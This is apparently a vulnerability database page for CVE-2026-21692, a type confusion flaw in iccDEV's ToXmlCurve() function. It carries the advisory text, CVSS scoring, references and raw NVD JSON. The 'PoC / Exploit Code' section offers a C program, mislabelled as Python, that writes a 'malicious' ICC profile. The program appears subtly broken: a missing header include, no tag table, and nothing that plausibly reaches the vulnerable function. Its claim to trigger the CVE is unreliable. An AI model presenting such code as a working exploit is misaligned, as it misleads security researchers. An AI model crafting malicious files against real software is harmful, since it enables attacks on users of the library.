CVE-2026-21692

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `ToXmlCurve()` at `IccXML/IccLibXML/IccMpeXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE

iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-21692 - Type Confusion in iccDEV ToXmlCurve()
// This PoC generates a malicious ICC profile that triggers type confusion

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// ICC Profile Header structure
typedef struct {
    uint32_t size;
    uint32_t cmm_type;
    uint32_t version;
    uint32_t device_class;
    uint32_t color_space;
    uint32_t pcs;
    uint32_t creation_date[3];
    uint32_t profile_file_sig;
    uint32_t primary_platform;
    uint32_t profile_flags;
    uint32_t device_manufacturer;
    uint32_t device_model;
    uint64_t device_attributes;
    uint32_t rendering_intent;
    uint32_t pcs_illuminant_XYZ[3];
    uint32_t creator_signature;
    uint32_t profile_id[4];
} ICC_Header;

// Malicious tag data to trigger type confusion
unsigned char malicious_tag_data[] = {
    0x00, 0x00, 0x00, 0x00,  // Curve type signature
    0x00, 0x01,              // Count of entries
    0xFF, 0xFF               // Curve data
};

void create_malicious_icc_profile(const char* filename) {
    FILE* fp = fopen(filename, "wb");
    if (!fp) {
        printf("Failed to create file\n");
        return;
    }
    
    // Write ICC profile header with crafted values
    ICC_Header header = {0};
    header.size = 128;
    header.profile_file_sig = 0x61637370;  // 'acsp'
    header.color_space = 0x52474220;        // 'RGB '
    header.pcs = 0x58595A20;                // 'XYZ '
    
    fwrite(&header, sizeof(ICC_Header), 1, fp);
    
    // Write malicious curve tag
    fwrite(malicious_tag_data, sizeof(malicious_tag_data), 1, fp);
    
    fclose(fp);
    printf("Malicious ICC profile created: %s\n", filename);
}

int main() {
    create_malicious_icc_profile("malicious_profile.icc");
    printf("To trigger CVE-2026-21692, process this ICC profile with vulnerable iccDEV library\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21692
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21692
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21692/
[4] VulDB https://vuldb.com/cve/CVE-2026-21692
[5] https://github.com/InternationalColorConsortium/iccDEV/issues/388
[6] https://github.com/InternationalColorConsortium/iccDEV/pull/432
[7] https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7662-mf46-wr88

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21692", "sourceIdentifier": "[email protected]", "published": "2026-01-07T22:15:45.677", "lastModified": "2026-01-12T18:27:18.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `ToXmlCurve()` at `IccXML/IccLibXML/IccMpeXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Las versiones anteriores a la 2.3.1.2 tienen una vulnerabilidad de confusión de tipos en 'ToXmlCurve()' en 'IccXML/IccLibXML/IccMpeXml.cpp'. Esta vulnerabilidad afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. La versión 2.3.1.2 contiene un parche. No hay soluciones alternativas conocidas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-588"}, {"lang": "en", "value": "CWE-704"}, {"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/388", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/432", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7662-mf46-wr88", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}